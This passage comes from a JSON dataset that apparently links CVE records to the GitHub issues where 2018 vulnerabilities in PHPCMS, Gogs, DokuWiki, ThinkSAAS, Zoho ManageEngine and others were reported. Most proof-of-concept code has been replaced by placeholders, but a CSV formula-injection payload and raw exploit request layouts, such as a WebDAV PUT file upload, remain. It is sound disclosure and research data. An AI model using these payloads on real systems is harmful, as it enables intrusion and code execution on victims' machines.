  23356. "description": "PHPCMS NUMBERTAG PHPCMS APITAG \u6f0f\u6d1e\u5730\u5740\uff1a URLTAG \u627e\u5230\u5b58\u5728\u9a8c\u8bc1\u7801\u5904\uff0c\u5ba1\u67e5\u5143\u7d20\u627e\u5230\u9a8c\u8bc1\u7801\u94fe\u63a5\uff1a FILETAG \u7136\u540e\u6293\u5305\uff0c\u89c2\u5bdf\u9a8c\u8bc1\u7801\u957f\u3001\u5bbd\u53ef\u63a7\uff1a URLTAG FILETAG FILETAG \u4e0d\u65ad\u52a0\u5927\u957f\u5bbd\uff0c\u591a\u6b21\u53d1\u5305\uff0c\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002 FILETAG FILETAG FILETAG APITAG \u4fee\u590d\uff1a \u5efa\u8bae\u914d\u7f6e\u56fe\u50cf\u9ed8\u8ba4\u53c2\u6570\uff0c\u662f\u53c2\u6570\u4e0d\u53ef\u63a7\u3002",
  23357. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23358. "severity": "HIGH",
  23359. "baseScore": 7.5,
  23360. "impactScore": 3.6,
  23361. "exploitabilityScore": 3.9
  23362. },
  23363. {
  23364. "CVE_ID": "CVE-2018-14944",
  23365. "Issue_Url_old": "https://github.com/thejinchao/jpeg_encoder/issues/4",
  23366. "Issue_Url_new": "https://github.com/thejinchao/jpeg_encoder/issues/4",
  23367. "Repo_new": "thejinchao/jpeg_encoder",
  23368. "Issue_Created_At": "2018-07-23T02:20:36Z",
  23369. "description": "SEGV in function APITAG I used Clang NUMBERTAG and APITAG to build jpeg encoder , this file URLTAG can cause SEGV in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
  23370. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23371. "severity": "HIGH",
  23372. "baseScore": 7.8,
  23373. "impactScore": 5.9,
  23374. "exploitabilityScore": 1.8
  23375. },
  23376. {
  23377. "CVE_ID": "CVE-2018-14945",
  23378. "Issue_Url_old": "https://github.com/thejinchao/jpeg_encoder/issues/6",
  23379. "Issue_Url_new": "https://github.com/thejinchao/jpeg_encoder/issues/6",
  23380. "Repo_new": "thejinchao/jpeg_encoder",
  23381. "Issue_Created_At": "2018-07-23T02:21:38Z",
  23382. "description": "heap buffer overflow in function APITAG I used Clang NUMBERTAG and APITAG to build jpeg encoder , this file URLTAG can cause heap buffer overflow in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
  23383. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23384. "severity": "HIGH",
  23385. "baseScore": 7.8,
  23386. "impactScore": 5.9,
  23387. "exploitabilityScore": 1.8
  23388. },
  23389. {
  23390. "CVE_ID": "CVE-2018-14946",
  23391. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/19",
  23392. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/19",
  23393. "Repo_new": "flexpaper/pdf2json",
  23394. "Issue_Created_At": "2018-07-23T11:08:54Z",
  23395. "description": "Alloc_dealloc_mismatch in function APITAG I use Clang NUMBERTAG and APITAG to build pdf2json NUMBERTAG this FILETAG can cause alloc dealloc mismatch with the following command: APITAG This is the ASAN information: ERRORTAG",
  23396. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23397. "severity": "HIGH",
  23398. "baseScore": 8.8,
  23399. "impactScore": 5.9,
  23400. "exploitabilityScore": 2.8
  23401. },
  23402. {
  23403. "CVE_ID": "CVE-2018-14947",
  23404. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/20",
  23405. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/20",
  23406. "Repo_new": "flexpaper/pdf2json",
  23407. "Issue_Created_At": "2018-07-23T11:09:27Z",
  23408. "description": "Alloc_dealloc_mismatch in function APITAG I use Clang NUMBERTAG and APITAG to build pdf2json NUMBERTAG this FILETAG can cause alloc dealloc mismatch with the following command: APITAG This is the ASAN information: ERRORTAG",
  23409. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23410. "severity": "HIGH",
  23411. "baseScore": 8.8,
  23412. "impactScore": 5.9,
  23413. "exploitabilityScore": 2.8
  23414. },
  23415. {
  23416. "CVE_ID": "CVE-2018-14948",
  23417. "Issue_Url_old": "https://github.com/dilawar/sound/issues/4",
  23418. "Issue_Url_new": "https://github.com/dilawar/sound/issues/4",
  23419. "Repo_new": "dilawar/sound",
  23420. "Issue_Created_At": "2018-07-24T10:35:37Z",
  23421. "description": "Alloc dealloc mismatch in function APITAG I used gcc NUMBERTAG and APITAG to build sound URLTAG , this file URLTAG can cause alloc dealloc mismatch when executing this command: APITAG This is the ASAN information: ERRORTAG",
  23422. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23423. "severity": "HIGH",
  23424. "baseScore": 7.8,
  23425. "impactScore": 5.9,
  23426. "exploitabilityScore": 1.8
  23427. },
  23428. {
  23429. "CVE_ID": "CVE-2018-14958",
  23430. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/6",
  23431. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/6",
  23432. "Repo_new": "alterebro/weaselcms",
  23433. "Issue_Created_At": "2018-08-03T13:29:07Z",
  23434. "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings NUMBERTAG There is a CSRF vulnerabilitie that can create new pages via FILETAG ?b=pages&a=new poc: APITAG create a new page CODETAG APITAG is a CSRF vulnerabilitie that can update the website settings via index.php poc: APITAG update the website settings CODETAG",
  23435. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23436. "severity": "HIGH",
  23437. "baseScore": 8.8,
  23438. "impactScore": 5.9,
  23439. "exploitabilityScore": 2.8
  23440. },
  23441. {
  23442. "CVE_ID": "CVE-2018-15129",
  23443. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/16",
  23444. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/16",
  23445. "Repo_new": "thinksaas/thinksaas",
  23446. "Issue_Created_At": "2018-08-07T05:29:05Z",
  23447. "description": "\u5b58\u50a8\u578bxss\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09/ Storage type APITAG to register and log in\uff09. Storage type APITAG to register and log in\uff09 When the article is published: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG Add an attack poc\uff1a APITAG APITAG to the NUMBERTAG Fp NUMBERTAG E after the content parameter Official return\uff1a URLTAG PATHTAG \u5b58\u50a8\u578bxss\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09 \u53d1\u8868\u6587\u7ae0\u65f6\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG \u5728content NUMBERTAG Fp NUMBERTAG E\u6dfb\u52a0\u653b\u51fbpoc: APITAG APITAG \u5b98\u65b9\u590d\u73b0\uff1a URLTAG",
  23448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23449. "severity": "MEDIUM",
  23450. "baseScore": 5.4,
  23451. "impactScore": 2.7,
  23452. "exploitabilityScore": 2.3
  23453. },
  23454. {
  23455. "CVE_ID": "CVE-2018-15130",
  23456. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/18",
  23457. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/18",
  23458. "Repo_new": "thinksaas/thinksaas",
  23459. "Issue_Created_At": "2018-08-07T08:00:18Z",
  23460. "description": "\u5b58\u50a8\u578bxss2\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09/ Storage type APITAG to register and log in\uff09. \u5f53\u6dfb\u52a0\u5c0f\u7ec4\u65f6\uff1a URLTAG When the group is added: URLTAG \u4fee\u6539\u5c0f\u7ec4\u4ecb\u7ecd\u65f6\uff1a When the revision of the panel: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG SE NUMBERTAG APITAG NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Content Disposition: form data; name=\"groupname\" name1 APITAG Content Disposition: form data; name=\"groupdesc\" describe1 APITAG APITAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream APITAG Content Disposition: form data; name=\"tag\" Label1 APITAG Content Disposition: form data; name=\"token\" APITAG APITAG \u5728groupdesc\u53c2\u6570\u7aef\u672a\u8fc7\u6ee4\u6076\u610f\u4ee3\u7801\uff0c\u9020\u6210\u6ce8\u5165\u3002 The malicious code is not filtered at the groupdesc parameter end, causing injection. POC\uff1a APITAG \u5b98\u65b9\u4e3e\u4f8b\uff1a URLTAG Official examples: URLTAG",
  23461. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23462. "severity": "MEDIUM",
  23463. "baseScore": 5.4,
  23464. "impactScore": 2.7,
  23465. "exploitabilityScore": 2.3
  23466. },
  23467. {
  23468. "CVE_ID": "CVE-2018-15137",
  23469. "Issue_Url_old": "https://github.com/safakaslan/CelaLinkCLRM20/issues/1",
  23470. "Issue_Url_new": "https://github.com/safakaslan/celalinkclrm20/issues/1",
  23471. "Repo_new": "safakaslan/CelaLinkCLRM20",
  23472. "Issue_Created_At": "2018-08-01T14:25:17Z",
  23473. "description": "Arbitrary File Upload Cela Link CLR M NUMBERTAG Exploit Title: Arbitrary File Upload Cela Link CLR M NUMBERTAG Date NUMBERTAG Shodan Dork: CLR M NUMBERTAG Exploit Author: Safak Aslan Software Link: FILETAG Version NUMBERTAG Authentication Required: No Tested on: Windows Vulnerability Description Due to the Via APITAG APITAG Distributed Authoring and Versioning), on the remote server, Cela Link CLR M NUMBERTAG allows unauthorized users to upload any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes remote code execution as well. Due to the APITAG it is possible to upload the arbitrary file utilizing the PUT method. Proof of Concept Request PUT FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en,tr TR; APITAG US;q NUMBERTAG Accept Encoding: gzip, deflate Content Length NUMBERTAG the reflection of random numbers NUMBERTAG Response HTTP NUMBERTAG Created Content Length NUMBERTAG Date: Fri NUMBERTAG Jul NUMBERTAG GMT Server: APITAG As a result, on the FILETAG , \"the reflection of random numbers NUMBERTAG is reflected on the page.",
  23474. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23475. "severity": "CRITICAL",
  23476. "baseScore": 9.8,
  23477. "impactScore": 5.9,
  23478. "exploitabilityScore": 3.9
  23479. },
  23480. {
  23481. "CVE_ID": "CVE-2018-15157",
  23482. "Issue_Url_old": "https://github.com/libyal/libfsclfs/issues/3",
  23483. "Issue_Url_new": "https://github.com/libyal/libfsclfs/issues/3",
  23484. "Repo_new": "libyal/libfsclfs",
  23485. "Issue_Created_At": "2018-08-08T06:44:43Z",
  23486. "description": "APITAG OOB read Access Violation. the libfsclfs_block_read function in APITAG in libfsclfs allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted clfs file. ERRORTAG FILETAG",
  23487. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23488. "severity": "MEDIUM",
  23489. "baseScore": 6.5,
  23490. "impactScore": 3.6,
  23491. "exploitabilityScore": 2.8
  23492. },
  23493. {
  23494. "CVE_ID": "CVE-2018-15158",
  23495. "Issue_Url_old": "https://github.com/libyal/libesedb/issues/43",
  23496. "Issue_Url_new": "https://github.com/libyal/libesedb/issues/43",
  23497. "Repo_new": "libyal/libesedb",
  23498. "Issue_Created_At": "2018-08-08T06:56:15Z",
  23499. "description": "Multiple bugs NUMBERTAG the libesedb_page_read_values function in libesedb_page.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the libesedb_page_read_tags function in libesedb_page.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the APITAG function in libesedb_catalog_definition.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the libesedb_key_append_data function in libesedb_key.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG FILETAG",
  23500. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23501. "severity": "MEDIUM",
  23502. "baseScore": 6.5,
  23503. "impactScore": 3.6,
  23504. "exploitabilityScore": 2.8
  23505. },
  23506. {
  23507. "CVE_ID": "CVE-2018-15168",
  23508. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/2",
  23509. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/2",
  23510. "Repo_new": "x-f1v3/forcve",
  23511. "Issue_Created_At": "2018-07-30T11:24:32Z",
  23512. "description": "Zoho manageengine Applications Manager SQL Injection vulnerability. Zoho manageengine Applications Manager SQL Injection vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn I found a SQL injection in the Zoho APITAG Applications Manager NUMBERTAG build) via the resids parameter in APITAG GET request. Proof of Concept: CODETAG This is a time-based blind SQL injection vulnerability, so I use sqlmap to exploit it. APITAG following is a proof screenshot. FILETAG To get the admin's password: FILETAG The vendor has fixed the vulnerability\uff1a FILETAG",
  23513. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23514. "severity": "CRITICAL",
  23515. "baseScore": 9.8,
  23516. "impactScore": 5.9,
  23517. "exploitabilityScore": 3.9
  23518. },
  23519. {
  23520. "CVE_ID": "CVE-2018-15169",
  23521. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/3",
  23522. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/3",
  23523. "Repo_new": "x-f1v3/forcve",
  23524. "Issue_Created_At": "2018-07-31T11:28:15Z",
  23525. "description": "Zoho manageengine Applications Manager NUMBERTAG build) Reflected XSS. Zoho manageengine Applications Manager NUMBERTAG build) Reflected XSS Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn I found a Reflected XSS in the Zoho APITAG Applications Manager NUMBERTAG build) via the method parameter in APITAG request. Proof of Concept APITAG Local test: FILETAG Demo site test: FILETAG Notice: This vul can reproduce without login. The vendor has fixed the vulnerability\uff1a FILETAG",
  23526. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23527. "severity": "MEDIUM",
  23528. "baseScore": 6.1,
  23529. "impactScore": 2.7,
  23530. "exploitabilityScore": 2.8
  23531. },
  23532. {
  23533. "CVE_ID": "CVE-2018-15192",
  23534. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5366",
  23535. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5366",
  23536. "Repo_new": "gogs/gogs",
  23537. "Issue_Created_At": "2018-08-06T10:24:52Z",
  23538. "description": "Server-side request forgery (SSRF) vulnerability in webhooks. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG You can see that I get the HTTP response of caddy running on APITAG of APITAG, which is only open to local users. I can also learn which ports are open, e.g. MySQL on port NUMBERTAG, even though it is only open to local users. Patch: validate the URL that users may input; webhooks shouldn't allow access to such internal addresses. Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
  23539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  23540. "severity": "HIGH",
  23541. "baseScore": 8.6,
  23542. "impactScore": 4.0,
  23543. "exploitabilityScore": 3.9
  23544. },
  23545. {
  23546. "CVE_ID": "CVE-2018-15192",
  23547. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4624",
  23548. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4624",
  23549. "Repo_new": "go-gitea/gitea",
  23550. "Issue_Created_At": "2018-08-06T13:17:25Z",
  23551. "description": "server side request forgery (SSRF) vulnerability in webhooks. Gitea version (or commit ref NUMBERTAG rc NUMBERTAG g9ea NUMBERTAG f1f Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [x] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [x] Yes (provide example URL) [ ] No [ ] Not relevant Log gist: Description Due to shared code base, gitea is affected by issue URLTAG (server side request forgery (SSRF) vulnerability in webhooks). To reproduce: create Webhook with target URL to any running existing service exposed only to localhost (for example localhost NUMBERTAG or localhost NUMBERTAG depending on what is running on the test machine). POST content Screenshots See URLTAG",
  23552. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  23553. "severity": "HIGH",
  23554. "baseScore": 8.6,
  23555. "impactScore": 4.0,
  23556. "exploitabilityScore": 3.9
  23557. },
  23558. {
  23559. "CVE_ID": "CVE-2018-15193",
  23560. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5367",
  23561. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5367",
  23562. "Repo_new": "gogs/gogs",
  23563. "Issue_Created_At": "2018-08-06T12:50:42Z",
  23564. "description": "Cross Site Request Forgery (CSRF) in admin panel. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG An attacker can embed an image tag in an issue; when an administrator views the issue, the browser issues the GET request and the operation is fired. See the online demo (attention: if an administrator visits it, your SSH keys are wiped out) URLTAG Patch: change these operations from GET to POST, or require a CSRF token for the GET method. Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
  23565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23566. "severity": "HIGH",
  23567. "baseScore": 8.8,
  23568. "impactScore": 5.9,
  23569. "exploitabilityScore": 2.8
  23570. },
  23571. {
  23572. "CVE_ID": "CVE-2018-15197",
  23573. "Issue_Url_old": "https://github.com/liu21st/onethink/issues/36",
  23574. "Issue_Url_new": "https://github.com/liu21st/onethink/issues/36",
  23575. "Repo_new": "liu21st/onethink",
  23576. "Issue_Created_At": "2018-08-06T13:43:30Z",
  23577. "description": "There are two CSRF vulnerabilities that together can add an administrator account. While the administrator is logged in, open the following two PoC pages: APITAG add a user CODETAG APITAG grant the user administrator privileges CODETAG",
  23578. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23579. "severity": "HIGH",
  23580. "baseScore": 8.8,
  23581. "impactScore": 5.9,
  23582. "exploitabilityScore": 2.8
  23583. },
  23584. {
  23585. "CVE_ID": "CVE-2018-15199",
  23586. "Issue_Url_old": "https://github.com/auracms/AuraCMS/issues/1",
  23587. "Issue_Url_new": "https://github.com/auracms/auracms/issues/1",
  23588. "Repo_new": "auracms/auracms",
  23589. "Issue_Created_At": "2018-08-06T12:11:02Z",
  23590. "description": "Stored XSS in bukutamu page. Description: A cross site scripting (XSS) vulnerability in APITAG may allow remote attackers (users) to inject arbitrary Web scripts through the source editor, which will cause an attacker (user) to get the administrator's cookie and log in to the administrator interface. Vulnerability Type: Stored XSS Attack Vectors: APITAG APITAG as a user FILETAG APITAG on Bukutamu > APITAG FILETAG APITAG XSS Payload : APITAG APITAG FILETAG NUMBERTAG Go to Bukutamu NUMBERTAG SS! FILETAG Attack Impact: This can be used to perform operations on an administrator (or any user leaving a message on the site) and can lead to hijacking an administrator's cookie.",
  23591. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23592. "severity": "MEDIUM",
  23593. "baseScore": 5.4,
  23594. "impactScore": 2.7,
  23595. "exploitabilityScore": 2.3
  23596. },
  23597. {
  23598. "CVE_ID": "CVE-2018-15202",
  23599. "Issue_Url_old": "https://github.com/Juunan06/eCommerce/issues/1",
  23600. "Issue_Url_new": "https://github.com/juunan06/ecommerce/issues/1",
  23601. "Repo_new": "juunan06/ecommerce",
  23602. "Issue_Created_At": "2018-08-06T07:46:27Z",
  23603. "description": "There is a CSRF vulnerability that can add new users, and add site projects to fake identity. There is a CSRF vulnerability that can add new users, and add site projects to fake identity APITAG user POC\uff1a CODETAG APITAG item POC\uff1a ERRORTAG",
  23604. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
  23605. "severity": "MEDIUM",
  23606. "baseScore": 6.3,
  23607. "impactScore": 3.4,
  23608. "exploitabilityScore": 2.8
  23609. },
  23610. {
  23611. "CVE_ID": "CVE-2018-15203",
  23612. "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/4",
  23613. "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/4",
  23614. "Repo_new": "ignitedcms/ignitedcms",
  23615. "Issue_Created_At": "2018-08-06T13:09:04Z",
  23616. "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings. APITAG is a CSRF vulnerability that can create new pages poc: CODETAG",
  23617. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  23618. "severity": "MEDIUM",
  23619. "baseScore": 6.5,
  23620. "impactScore": 3.6,
  23621. "exploitabilityScore": 2.8
  23622. },
  23623. {
  23624. "CVE_ID": "CVE-2018-15474",
  23625. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2450",
  23626. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2450",
  23627. "Repo_new": "dokuwiki/dokuwiki",
  23628. "Issue_Created_At": "2018-07-19T18:07:14Z",
  23629. "description": "CSV Formula Injection vulnerability. The following was reported directly to me by Jean Benjamin Rousseau from SEC Consult APITAG AG Vulnerability overview/description: The administration panel of the application has a \"CSV export of users\" feature which allows the export of user data (username, real name, email address and user groups) as a CSV file. On the registration page, it is possible for an attacker to set certain values in the Real Name field that when exported and opened with a spreadsheet application APITAG Excel, Open Office, etc.) will be interpreted as a formula. This puts the administrators who open those malicious exported files at risk. Exfiltration of sensitive data or even the execution of arbitrary code on the local machine of the victim will be the result. The final impact depends on the used spreadsheet software on the client of the victim. Proof of concept: Registration URL: URLTAG When the registration request is submitted, the following parameters are sent in a POST request: APITAG ` The \"fullname\" parameter is not sanitized before being stored and during the CSV export. An attacker can inject different CSV formula payloads in the fullname parameter. For example: =cmd|'/C calc'!A0 As soon as the file gets opened in Microsoft Excel, the program FILETAG is launched. Different warnings might pop up. However, these warnings are usually ignored because the file comes from a trusted source.",
  23630. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  23631. "severity": "CRITICAL",
  23632. "baseScore": 9.6,
  23633. "impactScore": 6.0,
  23634. "exploitabilityScore": 2.8
  23635. },
  23636. {
  23637. "CVE_ID": "CVE-2018-15503",
  23638. "Issue_Url_old": "https://github.com/swoole/swoole-src/issues/1882",
  23639. "Issue_Url_new": "https://github.com/swoole/swoole-src/issues/1882",
  23640. "Repo_new": "swoole/swoole-src",
  23641. "Issue_Created_At": "2018-08-14T05:30:41Z",
  23642. "description": "SIGSEGV in Swoole APITAG function. Description: Swoole unpack function produces a sigsegv when it calls i_zval_ptr_dtor: Tested on: PHP NUMBERTAG cli) (built: Aug NUMBERTAG NTS ) Swoole: swoole NUMBERTAG Backtrace NUMBERTAG bc NUMBERTAG in i_zval_ptr_dtor (zval_ptr NUMBERTAG ffff NUMBERTAG b NUMBERTAG at PATHTAG NUMBERTAG zend_array_destroy (ht NUMBERTAG ffff NUMBERTAG f3f0) at PATHTAG NUMBERTAG b NUMBERTAG a7 in _zval_dtor_func (p NUMBERTAG ffff NUMBERTAG f3f0) at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in _zval_ptr_dtor_nogc (zval_ptr NUMBERTAG fffffff NUMBERTAG at PATHTAG NUMBERTAG swoole_unserialize_object (buffer NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c0, bucket_len NUMBERTAG args NUMBERTAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG aeecd in swoole_unserialize_arr (buffer NUMBERTAG ffff NUMBERTAG f NUMBERTAG b, zvalue NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b6e NUMBERTAG in php_swoole_unserialize (buffer NUMBERTAG ffff NUMBERTAG f NUMBERTAG a, len NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c NUMBERTAG object_args NUMBERTAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG f7 in zim_swoole_serialize_unpack (execute_data NUMBERTAG ffff NUMBERTAG c NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG d NUMBERTAG b3 in APITAG () at PATHTAG NUMBERTAG execute_ex (e NUMBERTAG ffff NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG d4c NUMBERTAG in zend_execute (op_array NUMBERTAG ffff NUMBERTAG c2a0, return_value NUMBERTAG at PATHTAG NUMBERTAG b9cdfb in zend_execute_scripts (type NUMBERTAG retval NUMBERTAG file_count NUMBERTAG at PATHTAG NUMBERTAG aeba NUMBERTAG in php_execute_script (primary_file NUMBERTAG fffffffe0c0) at PATHTAG NUMBERTAG d4f NUMBERTAG d in do_cli (argc NUMBERTAG arg NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG d NUMBERTAG d0 in main (argc NUMBERTAG arg NUMBERTAG f NUMBERTAG at PATHTAG ERRORTAG NUMBERTAG ffff 
NUMBERTAG e1 in __libc_start_main (main NUMBERTAG d NUMBERTAG d APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG d3a in _start () Registers: ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG ffff NUMBERTAG b NUMBERTAG rdi NUMBERTAG ffff NUMBERTAG f3f NUMBERTAG rbp NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG rsp NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG r NUMBERTAG ffff NUMBERTAG r NUMBERTAG fffffff7aac NUMBERTAG r NUMBERTAG r NUMBERTAG bbc NUMBERTAG r NUMBERTAG d NUMBERTAG r NUMBERTAG fffffffe NUMBERTAG r NUMBERTAG ffff NUMBERTAG c NUMBERTAG r NUMBERTAG ffff NUMBERTAG f NUMBERTAG rip NUMBERTAG bc NUMBERTAG bc NUMBERTAG APITAG eflags NUMBERTAG IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG APITAG info NUMBERTAG bc NUMBERTAG APITAG mov eax, dword ptr [ra NUMBERTAG bc NUMBERTAG APITAG lea edx, [ra NUMBERTAG bc NUMBERTAG APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG APITAG mov dword ptr [rax], ed NUMBERTAG bc NUMBERTAG b APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG f APITAG mov eax, dword ptr [ra NUMBERTAG bc NUMBERTAG APITAG test eax, ea NUMBERTAG bc NUMBERTAG APITAG jne zend_array_destroy NUMBERTAG APITAG NUMBERTAG bc NUMBERTAG APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG APITAG mov qword ptr [rbp NUMBERTAG ra NUMBERTAG bc NUMBERTAG b APITAG mov rax, qword ptr [rbp NUMBERTAG static zend_always_inline void i_zval_ptr_dtor(zval zval_ptr ZEND_FILE_LINE_DC NUMBERTAG if (Z_REFCOUNTED_P(zval_ptr NUMBERTAG zend_refcounted ref = Z_COUNTED_P(zval_ptr NUMBERTAG if (! 
